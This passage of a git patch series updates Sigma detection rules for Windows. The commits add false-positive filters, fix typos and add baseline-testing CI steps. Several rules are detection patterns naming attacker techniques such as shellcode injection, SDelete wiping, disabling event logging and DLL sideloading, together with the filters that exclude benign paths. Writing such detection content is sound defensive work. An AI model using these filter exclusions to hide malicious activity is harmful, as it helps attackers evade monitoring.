as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\Dropbox.' + filter_wireshark: + Image|endswith: '\AppData\Local\Temp\Wireshark_uninstaller.exe' + # We don't use the HKCR anchor as it could be logged as a different variation (HKEY_CLASSES_ROOT) + TargetObject|contains: '\wireshark-capture-file\' + condition: selection and not 1 of filter_* falsepositives: - - Unknown + - Unknown level: medium tags: - - attack.defense_evasion - - attack.t1112 + - attack.defense_evasion + - attack.t1112 From e4e2177533693dfbe8948d72d164902187900eb1 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:56:58 +0200 Subject: [PATCH 77/96] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 4 +--- 1 file changed, 1 insertion(+), 3 deletions(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 03798c09f..9c04a6701 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -17,12 +17,10 @@ detection: - '.AAA' - '.ZZZ' filter_wireshark: - # This event occurs when (un)installing wireshark - TargetFilename: 'C:\Program Files\Wireshark\radius\dictionary.alcatel-lucent.aaa' + TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' condition: selection falsepositives: - Legitime usage of SDelete - - An FP may occure if the installation directory of wireshark is changed level: medium tags: - attack.defense_evasion From e987fa6acb9e73e03c46ad905069bd276bf3c008 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:57:10 +0200 Subject: [PATCH 78/96] Update file_delete_win_sysinternals_sdelete_file_deletion.yml --- .../file_delete_win_sysinternals_sdelete_file_deletion.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml index 9c04a6701..64ea228a5 100644 --- a/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml +++ b/rules/windows/file_delete/file_delete_win_sysinternals_sdelete_file_deletion.yml @@ -18,7 +18,7 @@ detection: - '.ZZZ' filter_wireshark: TargetFilename|endswith: '\Wireshark\radius\dictionary.alcatel-lucent.aaa' - condition: selection + condition: selection and not 1 of filter_* falsepositives: - Legitime usage of SDelete level: medium From a0c3449079acc2e2d460dc2b4af577d1a2daf749 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:59:12 +0200 Subject: [PATCH 79/96] Fix typo --- rules/windows/network_connection/net_connection_win_python.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index bc3737dcb..4d50017c2 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -29,7 +29,7 @@ detection: CommandLine|contains|all: - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: - # This coumd be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances + # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 SourceIp: 127.0.0.1 condition: selection and not 1 of filter_* From d9cd98838f6ee552fe5474baec0af8c052575178 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:02:15 +0200 Subject: [PATCH 80/96] Add descriptions --- .../process_access_win_shellcode_inject_msf_empire.yml | 2 +- rules/windows/process_creation/proc_creation_win_mstsc.yml | 4 +++- 2 files changed, 4 insertions(+), 2 deletions(-) diff --git a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml index b495e82c8..d9d77b85b 100644 --- a/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml +++ b/rules/windows/process_access/process_access_win_shellcode_inject_msf_empire.yml @@ -48,4 +48,4 @@ detection: condition: selection and not 1 of filter_* falsepositives: - Empire's csharp_exe payload uses 0x1f3fff for process enumeration as well -level: high \ No newline at end of file +level: high diff --git a/rules/windows/process_creation/proc_creation_win_mstsc.yml b/rules/windows/process_creation/proc_creation_win_mstsc.yml index 9278e5b04..0fb8cc3ec 100644 --- a/rules/windows/process_creation/proc_creation_win_mstsc.yml +++ b/rules/windows/process_creation/proc_creation_win_mstsc.yml @@ -26,11 +26,13 @@ detection: - ' /u' - ' /p' filter_mstsc_1: + # Example: mstsc.exe /v:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /hvsocketserviceid:XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX /silent /wslg /plugin:WSLDVC /wslgsharedmemorypath:WSL\XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\wslg C:\ProgramData\Microsoft\WSL\wslg.rdp ParentImage: 'C:\Windows\System32\lxss\wslhost.exe' CommandLine|contains: 'C:\ProgramData\Microsoft\WSL\wslg.rdp' condition: all of selection_mstsc* and not 1 of filter_mstsc_* or all of selection_cmdkey* falsepositives: - - Unknown + - WSL (Windows Sub System For Linux) + - Other currently unknown software level: medium tags: - attack.lateral_movement From 7dd2af08e7d48609269482794762d9ba92c8e92a Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 12:16:15 +0200 Subject: [PATCH 81/96] Update net_connection_win_python.yml --- rules/windows/network_connection/net_connection_win_python.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/network_connection/net_connection_win_python.yml b/rules/windows/network_connection/net_connection_win_python.yml index 4d50017c2..bebc55259 100644 --- a/rules/windows/network_connection/net_connection_win_python.yml +++ b/rules/windows/network_connection/net_connection_win_python.yml @@ -26,8 +26,7 @@ detection: # Related to anaconda opening an instance of Jupyter Notebook # This filter will only work with aurora agent enriched data as Sysmon EID 3 doesn't contain CommandLine nor ParentImage ParentImage: C:\ProgramData\Anaconda3\python.exe - CommandLine|contains|all: - - 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' + CommandLine|contains: 'C:\ProgramData\Anaconda3\Scripts\jupyter-notebook-script.py' filter_local_communication: # This could be caused when launching an instance of Jupyter Notebook locally for example but can also be caused by other instances of python openning sockets locally etc. So comment this out if you want to monitor for those instances DestinationIp: 127.0.0.1 From 4a741290482e16bc0c02f45361f2bee4a920451d Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Wed, 21 Sep 2022 13:12:21 +0200 Subject: [PATCH 82/96] Fix after review --- .../image_load/image_load_side_load_antivirus.yml | 10 +++++++--- .../image_load/image_load_susp_python_image_load.yml | 7 ++++--- .../proc_creation_win_susp_codepage_lookup.yml | 8 +++++--- 3 files changed, 16 insertions(+), 9 deletions(-) diff --git a/rules/windows/image_load/image_load_side_load_antivirus.yml b/rules/windows/image_load/image_load_side_load_antivirus.yml index f2198619d..ce7c17e00 100644 --- a/rules/windows/image_load/image_load_side_load_antivirus.yml +++ b/rules/windows/image_load/image_load_side_load_antivirus.yml @@ -6,6 +6,7 @@ references: - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there) author: Nasreddine Bencherchali, Wietze Beukema (project and research) date: 2022/08/17 +modified: 2022/09/21 tags: - attack.defense_evasion - attack.persistence @@ -19,10 +20,13 @@ detection: # Bitdefender selection_bitdefender: ImageLoaded|endswith: '\log.dll' - filter_bitdefender: + filter_log_dll_bitdefender: ImageLoaded|startswith: - 'C:\Program Files\Bitdefender Antivirus Free\' - 'C:\Program Files (x86)\Bitdefender Antivirus Free\' + filter_log_dll_other: + - ImageLoaded: 'C:\Program Files\Dell\SARemediation\plugin\log.dll' + - ImageLoaded|startswith: 'C:\Program Files\Canon\MyPrinter\' # F-Secure selection_fsecure: ImageLoaded|endswith: '\qrt.dll' @@ -40,9 +44,9 @@ detection: ImageLoaded|startswith: - 'C:\Program Files\McAfee\' - 'C:\Program Files (x86)\McAfee\' - condition: (selection_bitdefender and not filter_bitdefender) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) + condition: (selection_bitdefender and not 1 of filter_log_dll_*) or (selection_fsecure and not filter_fsecure) or (selection_mcafee and not filter_mcafee) falsepositives: - Applications that load the same dlls mentioned in the detection section. Investigate them and filter them out if a lot FPs are caused. - - Dell SARemediation pulgin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. + - Dell SARemediation plugin folder (C:\Program Files\Dell\SARemediation\plugin\log.dll) is known to contain the 'log.dll' file. - The Canon MyPrinter folder 'C:\Program Files\Canon\MyPrinter\' is known to contain the 'log.dll' file level: medium diff --git a/rules/windows/image_load/image_load_susp_python_image_load.yml b/rules/windows/image_load/image_load_susp_python_image_load.yml index 8ddb710a6..9b071a802 100644 --- a/rules/windows/image_load/image_load_susp_python_image_load.yml +++ b/rules/windows/image_load/image_load_susp_python_image_load.yml @@ -3,7 +3,7 @@ id: cbb56d62-4060-40f7-9466-d8aaf3123f83 description: Detects the image load of Python Core indicative of a Python script bundled with Py2Exe. status: experimental date: 2020/05/03 -modified: 2021/12/05 +modified: 2022/09/21 author: Patrick St. John, OTR (Open Threat Research) tags: - attack.defense_evasion @@ -23,10 +23,11 @@ detection: - Image|startswith: - 'C:\Program Files\' - 'C:\Program Files (x86)\' + - 'C:\ProgramData\Anaconda3\' # Comment out if you don't use Anaconda in your environment condition: selection and not filter fields: - Description falsepositives: - - Legit Py2Exe Binaries - - Known false positive caused with anaconda installation/update + - Legitimate Py2Exe Binaries + - Known false positive caused with Python Anaconda level: medium diff --git a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml index fb9250c74..3e7830ad4 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_codepage_lookup.yml @@ -7,7 +7,7 @@ references: - https://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/ - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/chcp date: 2022/02/21 -modified: 2022/04/21 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -22,13 +22,15 @@ detection: - 'chcp' - 'chcp ' - 'chcp ' - condition: selection + filter_anaconda: + # This filter will only work with aurora agent enriched data as Sysmon EID 1 and EID 4688 from event log both do not contain GrandparentCommandLine field + GrandparentCommandLine|contains: '/c C:\ProgramData\Anaconda3' + condition: selection and not 1 of filter_* fields: - CommandLine - ParentCommandLine falsepositives: - During Anaconda update the 'conda.exe' process will eventually launch the command described in the detection section - - Other currently unknown cases level: high tags: - attack.discovery From 4f6d4b7c80086967a6286deb3b066c7ab022303f Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 12:15:04 +0200 Subject: [PATCH 83/96] fix: FP in testing environment --- .../registry_set/registry_set_disable_winevt_logging.yml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml index 462cceb32..08ad446bf 100644 --- a/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml +++ b/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml @@ -3,7 +3,7 @@ id: 2f78da12-f7c7-430b-8b19-a28f269b77a3 description: Detects tempering with the "Enabled" registry key in order to disable windows logging of a windows event channel author: frack113, Nasreddine Bencherchali date: 2022/07/04 -modified: 2022/09/19 +modified: 2022/09/20 status: experimental references: - https://twitter.com/WhichbufferArda/status/1543900539280293889 @@ -28,6 +28,7 @@ detection: - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-FileInfoMinifilter' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-ASN1\' - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Kernel-AppCompat\' + - '\Microsoft\Windows\CurrentVersion\WINEVT\Channels\Microsoft-Windows-Runtime\Error\' filter_empty: # This filter is related to aurora. Should be removed when fix is deployed. # TODO: Remove later Image: - '' From e5e5cdd3b344104960c165337ebe5ce632d08a1d Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Tue, 20 Sep 2022 14:15:18 +0200 Subject: [PATCH 84/96] workflow: update evtx-baseline to v0.7 and add a new test for the data --- .github/workflows/sigma-test.yml | 20 +++++++++++++++++++- tests/check-baseline-local.sh | 15 +++++++++++++++ 2 files changed, 34 insertions(+), 1 deletion(-) diff --git a/.github/workflows/sigma-test.yml b/.github/workflows/sigma-test.yml index f40ccf5ea..60b6cdc96 100644 --- a/.github/workflows/sigma-test.yml +++ b/.github/workflows/sigma-test.yml @@ -13,7 +13,7 @@ on: # yamllint disable-line rule:truthy - oscd env: - EVTX_BASELINE_VERSION: v0.6 + EVTX_BASELINE_VERSION: v0.7 jobs: test-sigma: @@ -132,3 +132,21 @@ jobs: ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path Win2022-AD/ --rule-path rules/windows/ > findings.json - name: Show findings excluding known FPs run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv + check-baseline-win2022-0-20348-azure: + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@v2 + - name: Download evtx-sigma-checker + run: wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/evtx-sigma-checker + - name: Download and extract Windows 2022 0 20348 Azure baseline + run: | + wget --no-verbose https://github.com/NextronSystems/evtx-baseline/releases/download/$EVTX_BASELINE_VERSION/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348.tgz + - name: Remove deprecated rules + run: 'grep -ERl "^status: deprecated" rules | xargs -r rm -v' + - name: Check for Sigma matches in baseline + run: | + chmod +x evtx-sigma-checker + ./evtx-sigma-checker --log-source tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path rules/windows/ > findings.json + - name: Show findings excluding known FPs + run: ./.github/workflows/matchgrep.sh findings.json .github/workflows/known-FPs.csv diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index 3c849f52d..b3d966d36 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -146,6 +146,18 @@ OS="Windows 11" pids+=($!) PID2OS[$!]=$OS +# Windows 2022.0.20348 Azure +OS="Windows 2022.0.20348 Azure" +{ + wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz + tar xzf win2022-0-20348-azure.tgz + echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" + ./evtx-sigma-checker --log-source "${SIGMA}"/tools/config/thor.yml --evtx-path win2022-0-20348-azure/ --rule-path windows/ > findings-win2022-0-20348-azure.json + echo " Finished Checking for Sigma matches in $OS baseline" +}& +pids+=($!) +PID2OS[$!]=$OS + # Sync with all background jobs for pid in ${pids[*]}; do echo "===> Waiting for PID $pid / ${PID2OS[$pid]}" @@ -171,6 +183,9 @@ echo "Windows 2022:" echo echo "Windows 2022 AD:" "${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-ad.json "${SIGMA}"/.github/workflows/known-FPs.csv +echo +echo "Windows 2022.0.20348 Azure:" +"${SIGMA}"/.github/workflows/matchgrep.sh findings-win2022-0-20348-azure.json "${SIGMA}"/.github/workflows/known-FPs.csv echo read -p "Removing temporary directory ${TMP}. Press Enter to continue." -s From 40e0dfcb292457b784cfe93c1a84d35979dbbfed Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:38:10 +0200 Subject: [PATCH 85/96] chore: add new known FPs --- .github/workflows/known-FPs.csv | 11 +++++++---- tests/check-baseline-local.sh | 4 ++++ 2 files changed, 11 insertions(+), 4 deletions(-) diff --git a/.github/workflows/known-FPs.csv b/.github/workflows/known-FPs.csv index e29877a27..a22dafcd5 100644 --- a/.github/workflows/known-FPs.csv +++ b/.github/workflows/known-FPs.csv @@ -5,17 +5,18 @@ db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;py db809f10-56ce-4420-8c86-d6a7d793c79c;Raw Disk Access Using Illegitimate Tools;target\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;sharepointclient 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;odopen +1277f594-a7d1-4f28-a2d3-73af5cbeab43;Windows Shell File Write to Suspicious Folder;Computer: Agamemnon e28a5a99-da44-436d-b7a0-2afc20a5f413;Whoami Execution;WindowsPowerShell 8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;sysmon-intense\.xml -8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: evtx-PC +8ac03a65-6c84-4116-acad-dc1558ff7a77;Sysmon Configuration Change;Computer: (evtx-PC|Agamemnon) 4358e5a5-7542-4dcb-b9f3-87667371839b;ISO or Image Mount Indicator in Recent Files;_Office_Professional_Plus_ 36480ae1-a1cb-4eaa-a0d6-29801d7e9142;Renamed Binary;WinRAR 73bba97f-a82d-42ce-b315-9182e76c57b1;Imports Registry Key From a File;Evernote 6741916F-B4FA-45A0-8BF8-8249C702033A;Added Rule in Windows Firewall with Advanced Security;\\Integration\\Integrator\.exe 00bb5bd5-1379-4fcf-a965-a5b6f7478064;Setting Change in Windows Firewall with Advanced Security;Level: 4 Task: 0 -162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer_Service\.exe -cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20.49.150.241 -bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151.101.64.223 +162ab1e4-6874-4564-853c-53ec3ab8be01;TeamViewer Remote Session;TeamViewer(_Service)?\.exe +cdc8da7d-c303-42f8-b08c-b4ab47230263;Rundll32 Internet Connection;20\.49\.150\.241 +bef0bc5a-b9ae-425d-85c6-7b2d705980c6;Python Initiated Connection;151\.101\.64\.223 9711de76-5d4f-4c50-a94f-21e4e8f8384d;Installation of TeamViewer Desktop;TeamViewer_Desktop\.exe 96f697b0-b499-4e5d-9908-a67bec11cdb6;Removal of Potential COM Hijacking Registry Keys;target\.exe 9494479d-d994-40bf-a8b1-eea890237021;Suspicious Add Scheduled Task Parent;TeamViewer_\.exe @@ -29,6 +30,7 @@ cfeed607-6aa4-4bbd-9627-b637deb723c8;New or Renamed User Account with '$' in Att 7b449a5e-1db5-4dd0-a2dc-4e3a67282538;Hidden Local User Creation;HomeGroupUser\$ 1f2b5353-573f-4880-8e33-7d04dcf97744;Sysmon Configuration Modification;Computer: evtx-PC 734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);WIN-FPV0DSIC9O6 +734f8d9b-42b8-41b2-bcf5-abaf49d5a3c8;Remote PowerShell Session Host Process (WinRM);Computer: Agamemnon a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;Ninite\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;Ninite\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe @@ -36,3 +38,4 @@ a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;target\.exe a96970af-f126-420d-90e1-d37bf25e50e1;Use Short Name Path in Image;unzip\.exe 349d891d-fef0-4fe4-bc53-eee623a15969;Use Short Name Path in Command Line;TeamViewer_\.exe 7a02e22e-b885-4404-b38b-1ddc7e65258a;Suspicious Schtasks Schedule Type;TeamViewer_\.exe +949f1ffb-6e85-4f00-ae1e-c3c5b190d605;949f1ffb-6e85-4f00-ae1e-c3c5b190d605;Computer: Agamemnon diff --git a/tests/check-baseline-local.sh b/tests/check-baseline-local.sh index b3d966d36..1c9bae2f7 100755 --- a/tests/check-baseline-local.sh +++ b/tests/check-baseline-local.sh @@ -113,6 +113,7 @@ PID2OS[$!]=$OS # Windows 10 OS="Windows 10" { + sleep 10 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win10-client.tgz tar xzf win10-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -125,6 +126,7 @@ PID2OS[$!]=$OS # Windows 2022 AD OS="Windows 2022 AD" { + sleep 20 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-ad.tgz tar xzf win2022-ad.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 2 minutes)" @@ -137,6 +139,7 @@ PID2OS[$!]=$OS # Windows 11 OS="Windows 11" { + sleep 30 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win11-client.tgz tar xzf win11-client.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" @@ -149,6 +152,7 @@ PID2OS[$!]=$OS # Windows 2022.0.20348 Azure OS="Windows 2022.0.20348 Azure" { + sleep 40 wget --quiet https://github.com/NextronSystems/evtx-baseline/releases/latest/download/win2022-0-20348-azure.tgz tar xzf win2022-0-20348-azure.tgz echo " Checking for Sigma matches in $OS baseline (this takes around 3 minutes)" From b7f20b884c8630aac5a6ce9ef379999e0711c9e1 Mon Sep 17 00:00:00 2001 From: phantinuss <79651203+phantinuss@users.noreply.github.com> Date: Wed, 21 Sep 2022 11:39:24 +0200 Subject: [PATCH 86/96] fix: FPs from new evtx-baseline --- .../windows/dns_query/dns_query_win_susp_ldap.yml | 11 +++++++---- ...le_event_win_susp_teamviewer_remote_session.yml | 4 ++-- .../image_load_uipromptforcreds_dlls.yml | 7 +++++-- .../posh_pm_alternate_powershell_hosts.yml | 6 ++++-- .../proc_creation_win_ntfs_short_name_use_cli.yml | 5 +++-- .../proc_creation_win_susp_regsvr32_anomalies.yml | 4 ++-- ...y_delete_removal_com_hijacking_registry_key.yml | 9 +++++++++ .../registry_event_susp_atbroker_change.yml | 10 +++++++--- ...sep_reg_keys_modification_currentcontrolset.yml | 9 ++++++++- ...t_asep_reg_keys_modification_currentversion.yml | 14 +++++++++++--- ..._set_asep_reg_keys_modification_wow6432node.yml | 5 ++++- .../registry_set_persistence_search_order.yml | 7 ++++++- .../registry_set_servicedll_hijack.yml | 4 +++- .../registry_set/registry_set_sip_persistence.yml | 7 ++++++- .../registry_set_susp_printer_driver.yml | 8 ++++++-- .../windows/sysmon/sysmon_config_modification.yml | 2 +- 16 files changed, 84 insertions(+), 28 deletions(-) diff --git a/rules/windows/dns_query/dns_query_win_susp_ldap.yml b/rules/windows/dns_query/dns_query_win_susp_ldap.yml index 5f0998042..8acfb3fce 100644 --- a/rules/windows/dns_query/dns_query_win_susp_ldap.yml +++ b/rules/windows/dns_query/dns_query_win_susp_ldap.yml @@ -1,9 +1,9 @@ -title: Suspicious Ldap Domain Access +title: Suspicious LDAP Domain Access id: a21bcd7e-38ec-49ad-b69a-9ea17e69509e -description: Detect suspicious ldap request from non Windows application +description: Detect suspicious LDAP request from non-Windows application status: experimental date: 2022/08/20 -modified: 2022/09/18 +modified: 2022/09/21 author: frack113 references: - https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1482/T1482.md @@ -16,7 +16,10 @@ detection: filter_windows: Image|startswith: 'C:\Windows\' filter_defender: - Image|startswith: 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + Image|startswith: + - 'C:\ProgramData\Microsoft\Windows Defender\Platform\' + - 'C:\Program Files\Windows Defender\MsMpEng.exe' + - 'C:\Program Files (x86)\Windows Defender\MsMpEng.exe' Image|endswith: '\MsMpEng.exe' filter_unknown: Image: '' diff --git a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml index 8d6fd06ce..bc6e34bd4 100644 --- a/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml +++ b/rules/windows/file_event/file_event_win_susp_teamviewer_remote_session.yml @@ -14,11 +14,11 @@ logsource: category: file_event detection: selection1: - TargetFilename|endswith: + TargetFilename|endswith: - '\TeamViewer\RemotePrinting\tvprint.db' - '\TeamViewer\TVNetwork.log' selection2: - TargetFilename|contains|all: + TargetFilename|contains|all: - '\TeamViewer' - '_Logfile.log' condition: 1 of selection* diff --git a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml index a9e409fd4..eac2f40fa 100644 --- a/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml +++ b/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml @@ -3,7 +3,7 @@ id: 9ae01559-cf7e-4f8e-8e14-4c290a1b4784 description: Detects potential use of UIPromptForCredentials functions by looking for some of the DLLs needed for it. status: experimental date: 2020/10/20 -modified: 2022/09/20 +modified: 2022/09/21 author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) tags: - attack.credential_access @@ -31,7 +31,10 @@ detection: - 'C:\Program Files\' - 'C:\Program Files (x86)\' filter_end: - Image|endswith: '\opera_autoupdate.exe' + Image|endswith: + - '\opera_autoupdate.exe' + - '\procexp64.exe' + - '\procexp.exe' filter_full: Image: - 'C:\Windows\ImmersiveControlPanel\SystemSettings.exe' diff --git a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml index 317ce299b..3f7989312 100644 --- a/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml +++ b/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml @@ -3,7 +3,7 @@ id: 64e8e417-c19a-475a-8d19-98ea705394cc description: Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe status: test date: 2019/08/11 -modified: 2022/09/18 +modified: 2022/09/20 author: Roberto Rodriguez @Cyb3rWard0g references: - https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html @@ -26,7 +26,9 @@ detection: filter_winrm: ContextInfo|contains: 'C:\Windows\system32\wsmprovhost.exe -Embedding' filter_help_update: - Payload|contains: 'Update-Help' + Payload|contains: + - 'Update-Help' + - 'Failed to update Help for the module' condition: selection and not 1 of filter* falsepositives: - Programs using PowerShell directly without invocation of a dedicated interpreter diff --git a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml index 4158116e8..3f75f2dfd 100644 --- a/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_cli.yml @@ -11,7 +11,7 @@ references: - https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN - https://twitter.com/jonasLyk/status/1555914501802921984 date: 2022/08/05 -modified: 2022/08/12 +modified: 2022/09/21 logsource: category: process_creation product: windows @@ -37,9 +37,10 @@ detection: - '~2.js' - '~2.hta' filter: - ParentImage|endswith: + - ParentImage|endswith: - '\WebEx\WebexHost.exe' - '\thor\thor64.exe' + - CommandLine|contains: 'C:\xampp\vcredist\VCREDI~1.EXE' condition: selection and not filter falsepositives: - Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process. diff --git a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml index 7cb98a4f5..3bd4048a7 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml @@ -4,7 +4,7 @@ status: experimental description: Detects various anomalies in relation to regsvr32.exe author: Florian Roth, oscd.community, Tim Shelton date: 2019/01/16 -modified: 2022/09/18 +modified: 2022/09/21 references: - https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html - https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/ @@ -74,7 +74,7 @@ detection: ParentImage: 'C:\Program Files\Box\Box\FS\streem.exe' CommandLine|contains: '\Program Files\Box\Box\Temp\' filter_legitimate: - CommandLine|contains: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll ' + CommandLine|endswith: '/s C:\Windows\System32\RpcProxy\RpcProxy.dll' condition: 1 of selection* and not 1 of filter* fields: - CommandLine diff --git a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml index 6b6ec4ec7..71184d34b 100644 --- a/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml +++ b/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml @@ -35,6 +35,15 @@ detection: Image|endswith: 